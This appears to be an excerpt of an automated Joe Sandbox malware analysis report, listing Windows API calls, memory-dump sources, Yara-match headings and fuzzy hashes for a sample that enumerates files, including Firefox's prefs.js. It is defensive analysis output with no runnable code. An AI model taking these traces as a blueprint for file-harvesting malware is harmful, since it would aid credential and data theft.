                                        • wsprintfA.USER32 ref: 004145A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                        • FindClose.KERNEL32(000000FF), ref: 004146A0
                                        • lstrcatA.KERNEL32(?,00861B48,?,00000104), ref: 004146C5
                                        • lstrcatA.KERNEL32(?,00860890), ref: 004146D8
                                        • lstrlenA.KERNEL32(?), ref: 004146E5
                                        • lstrlenA.KERNEL32(?), ref: 004146F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 13328894-2848263008
                                        • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                        • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                        • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                        • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                        APIs
                                        • wsprintfA.USER32 ref: 022F4B93
                                        • FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                        • FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID:
                                        • API String ID: 180737720-0
                                        • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                        • Instruction ID: 8a96fbd99315f11866ddfb7799df7a3b88a99b978fc153fb39681307166f6792
                                        • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                        • Instruction Fuzzy Hash: BF6176B6950218ABCB24EFE0DD48FEAB3BDFB49700F404598A60D92144EB75A785CF91
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022EC15C
                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 022EC1B4
                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 022EC1CA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022ECA26
                                        • FindClose.KERNEL32(000000FF), ref: 022ECA38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                        • Instruction ID: 515f4dc4328690271e4ef63c10740bfe72ce211f0698a665500e873e7073eb5a
                                        • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                        • Instruction Fuzzy Hash: 17424172920304ABCF54FBE4DD95EEDB37AAF94700F404169A60E96198EF349B48CF51
                                        APIs
                                        • wsprintfA.USER32 ref: 00413EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                        • FindClose.KERNEL32(000000FF), ref: 00414081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                        • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                        • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                        • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                        • wsprintfA.USER32 ref: 022F480D
                                        • FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022F4852
                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022F4868
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022F48F2
                                        • FindClose.KERNEL32(000000FF), ref: 022F4907
                                        • lstrcat.KERNEL32(?,0064A524), ref: 022F492C
                                        • lstrcat.KERNEL32(?,0064A22C), ref: 022F493F
                                        • lstrlen.KERNEL32(?), ref: 022F494C
                                        • lstrlen.KERNEL32(?), ref: 022F495D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID:
                                        • API String ID: 671575355-0
                                        • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                        • Instruction ID: f64c76d73fef15a40c69913949843d6cd838b9dcefb2fd7c36363173fe78561d
                                        • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                        • Instruction Fuzzy Hash: D65196B9550218ABCB60EFF0DD89FEEB37DAB58700F404598E70992194DBB49B84CF91
                                        APIs
                                        • wsprintfA.USER32 ref: 022F412A
                                        • FindFirstFileA.KERNEL32(?,?), ref: 022F4141
                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022F416F
                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022F4185
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022F42D3
                                        • FindClose.KERNEL32(000000FF), ref: 022F42E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID:
                                        • API String ID: 180737720-0
                                        • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                        • Instruction ID: f552050cb3c24e044b2156bc477af6bd32f687b64f0bc92d96c1aec3e101da15
                                        • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                        • Instruction Fuzzy Hash: 1D5183B5910218BBCB24FBF0DC85EEAB37DBB48700F404598A74992044DBB5AB85CF95
                                        APIs
                                        • wsprintfA.USER32 ref: 0040ED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                        • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 6d6cc13edc78d4633538e8b2d702efdd8071718cb3ffc378e1c6fc0d9658b0fd
                                        • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                        • Opcode Fuzzy Hash: 6d6cc13edc78d4633538e8b2d702efdd8071718cb3ffc378e1c6fc0d9658b0fd
                                        • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                        • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: 4@$\*.*
                                        • API String ID: 2325840235-1993203227
                                        • Opcode ID: 4041668613b5f57796810780085304b699960422328d2972eb419193a1ffae45
                                        • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                        • Opcode Fuzzy Hash: 4041668613b5f57796810780085304b699960422328d2972eb419193a1ffae45
                                        • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 2d01c268ff1c43dce93bc04d1201bf8767121ae327236aa69c931edc7f9ae462
                                        • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                        • Opcode Fuzzy Hash: 2d01c268ff1c43dce93bc04d1201bf8767121ae327236aa69c931edc7f9ae462
                                        • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                                        • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                                        • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                        • FindClose.KERNEL32(000000FF), ref: 00401E32
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 80858942f2c521134ab9608d7a12801beda7e0f9b4e57a743f2cc7afb66fddf5
                                        • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                                        • Opcode Fuzzy Hash: 80858942f2c521134ab9608d7a12801beda7e0f9b4e57a743f2cc7afb66fddf5
                                        • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                        APIs
                                        • wsprintfA.USER32 ref: 022EEFA5
                                        • FindFirstFileA.KERNEL32(?,?), ref: 022EEFBC
                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 022EF012
                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 022EF028
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022EF515
                                        • FindClose.KERNEL32(000000FF), ref: 022EF52A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID:
                                        • API String ID: 180737720-0
                                        • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                        • Instruction ID: 5fc49010422755d1777c2abeaf54777e42781dc8abb2784f6c0d2cf12eb96ad2
                                        • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                        • Instruction Fuzzy Hash: 61E1F0729213189ADB98FBA4DD51EEEB33AAF64300F4041E9B20E62155EF345F89CF50
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022EDD52
                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 022EDD9A
                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 022EDDB0
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE033
                                        • FindClose.KERNEL32(000000FF), ref: 022EE045
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                        • Instruction ID: 7851fd3f881908eb277134c6bd20698cd3f2e29a1a9bf94dece3e323b374f225
                                        • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                        • Instruction Fuzzy Hash: DD9152729203049BCF14FBF4DD559EDB37EAB99700F408668A94E96148EF389B1C8F91
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                        • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 68161af3e0fd90f6308ff94c6a98d0739bcec4e61ec8fe0137d802d9e534f1df
                                        • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                        • Opcode Fuzzy Hash: 68161af3e0fd90f6308ff94c6a98d0739bcec4e61ec8fe0137d802d9e534f1df
                                        • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                                        • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                        • Instruction ID: 6c45e323eb97f3f5fe0a980a2654476231ca5aa70f4130f23701df1e8cec4963
                                        • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                        • Instruction Fuzzy Hash: FCB150719203189BCF64FFA4DDA5EEEB37AAF54300F4081A9A50E56258EF345B48CF91
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*$@
                                        • API String ID: 433455689-2355794846
